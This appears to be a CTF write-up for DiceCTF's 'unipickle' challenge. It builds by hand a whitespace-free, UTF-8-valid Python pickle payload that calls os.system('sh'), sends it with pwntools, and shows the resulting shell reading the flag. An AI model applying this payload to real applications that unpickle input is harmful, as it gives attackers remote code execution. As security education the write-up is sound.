u.twoha.cc/ctf/dicectf/misc_unipickle.md at 50474d894050974d66566d5ba73188e3a085a7e2

caandt/u.twoha.cc

Fork 0

caandt 50474d8940 yeah

2024-09-13 19:49:18 -05:00

7.9 KiB

Raw Blame History

date

Task

misc/unipickle

pickle

nc mc.ax 31773

unipickle.py

Author: kmh
Points: 144
Solves: 68 / 1040 (6.538%)

Writeup

The challenge consists of a very short python file that just unpickles our input and exits:

#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())

Looking at Python's documentation for the pickle module, we can see the following:

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

A quick search shows us that we can pickle code to get a shell as follows:

import pickle
import os

class A:
    def __reduce__(self):
        return (os.system, ('sh',))

payload = pickle.dumps(A())
print(payload)
# b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02sh\x94\x85\x94R\x94.'

Now we just need to send this to the program:

from pwn import remote

r = remote('mc.ax', 31773)
r.sendline(payload)
r.interactive()

However, when we run this, we get the following error:

pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'utf-8' codec can't encode character '\udc80' in position 0: surrogates not allowed

It appears that our pickle code will need to be a valid UTF-8 string.

The pickle format has gone through multiple iterations, called protocols. Protocol 0 was the first pickle format, and was designed to consist of entirely ASCII characters.

Let's try dumping our code again, this time using protocol 0:

payload = pickle.dumps(A(), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'

Now we get a different error:

pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
_pickle.UnpicklingError: pickle data was truncated

A closer look at the code reveals that our input is split and truncated on whitespace before being unpickled, meaning that we cannot use any spaces or newlines in our pickle code.

We can try using every protocol available (up to protocol 5), but none of them run without error. Since we cannot produce pickle code that will pass this challenge using pickle.dumps, we will have to write the pickle code by hand.

The pickletools module contains a considerable amount of documentation on the pickle format, including a brief overview on pickling:

"A pickle" is a program for a virtual pickle machine (PM, but more accurately called an unpickling machine). It's a sequence of opcodes, interpreted by the PM, building an arbitrarily complex Python object.

For the most part, the PM is very simple: there are no looping, testing, or conditional instructions, no arithmetic and no function calls. Opcodes are executed once each, from first to last, until a STOP opcode is reached.

The PM has two data areas, "the stack" and "the memo".

Many opcodes push Python objects onto the stack; e.g., INT pushes a Python integer object on the stack, whose value is gotten from a decimal string literal immediately following the INT opcode in the pickle bytestream. Other opcodes take Python objects off the stack. The result of unpickling is whatever object is left on the stack when the final STOP opcode is executed.

The memo is simply an array of objects, or it can be implemented as a dict mapping little integers to objects. The memo serves as the PM's "long term memory", and the little integers indexing the memo are akin to variable names. Some opcodes pop a stack object into the memo at a given index, and others push a memo object at a given index onto the stack again.

pickletools also lets us disassemble pickle code, so let's see how our previous payload works:

>>> pickletools.dis(payload)
    0: c    GLOBAL     'posix system'
   14: p    PUT        0
   17: (    MARK
   18: V        UNICODE    'sh'
   22: p        PUT        1
   25: t        TUPLE      (MARK at 17)
   26: p    PUT        2
   29: R    REDUCE
   30: p    PUT        3
   33: .    STOP
highest protocol among opcodes = 0

The important instructions to look at are:

# push the global posix.system onto the pickle stack (which is the same as os.system here)
    0: c    GLOBAL     'posix system'
# push a mark onto the pickle stack
   17: (    MARK
# push the string 'sh' onto the pickle stack
   18: V        UNICODE    'sh'
# pop until the mark and create a tuple of popped items
   25: t        TUPLE      (MARK at 17)
# call stack[-2](*stack[-1]) => posix.system('sh')
   29: R    REDUCE

The GLOBAL ('c') instruction requires two string arguments ending in newlines, so we cannot use this instruction. The only other instruction to load a global is STACK_GLOBAL ('\x93'), which pops two strings off the stack for arguments.

We also cannot use the UNICODE ('V') instruction since it takes a single string argument ending in a newline. Instead, we can use the BINUNICODE ('X') instruction, which is followed by a little-endian uint32 and a UTF-8 encoded string with length equal to the first argument.

Now our pickle code without any whitespace is as follows:

# push 'os' to the stack
payload = b'X\x02\x00\x00\x00os'
# push 'system' to the stack
payload += b'X\x06\x00\x00\x00system'
# pop 'os' and 'system', push os.system
payload += b'\x93'
# push a mark
payload += b'('
# push 'sh'
payload += b'X\x02\x00\x00\x00sh'
# pop mark and 'sh', push ('sh',)
payload += b't'
# pop os.system, ('sh',), call os.system('sh')
payload += b'R'

# we do not have whitespace in our payload
assert all(b not in payload for b in b' \t\n\r\x0b\x0c')

However, our code is still not valid UTF-8. For our code to be valid UTF-8, any byte matching 0b10xxxxxx must come after:

a byte matching 0b110xxxxx
a byte matching 0b1110xxxx followed by a byte matching 0b10xxxxxx
a byte matching 0b11110xxx followed by 2 bytes matching 0b10xxxxxx

The only part causing a problem is the STACK_GLOBAL instruction, since its opcode is '\x93', or 0b10010011. The rest of the bytes all have 0 in the most significant bit, so they will not cause any problems.

To fix our code, we will choose to satisfy the first option, as it is the simplest.

Now we just need to find an instruction to come before STACK_GLOBAL that ends with a byte matching 0b110xxxxx. Additionally, this instruction must not push or pop anything from the stack because we need 'os' and 'system' to be on top when STACK_GLOBAL is executed.

One such instruction is the BINPUT ('q') instruction, which is followed by a uint8 that specifies which index of the memo to copy the top of the stack into. This is effectively a no-op in our case.

After inserting the following line right before we add STACK_GLOBAL, our code becomes valid UTF-8:

# put 'system' into index 195 of the memo
payload += b'q\xc3'

Running our script now successfully gives us a shell. From here, we run the following commands to get the flag:

$ ls /
app
bin
boot
dev
etc
flag.eEdyUbJSVb2TmzALwXHS.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.eEdyUbJSVb2TmzALwXHS
dice{pickle_5d9ae1b0fee}

7.9 KiB Raw Blame History

Task

Writeup

Reference

7.9 KiB

Raw Blame History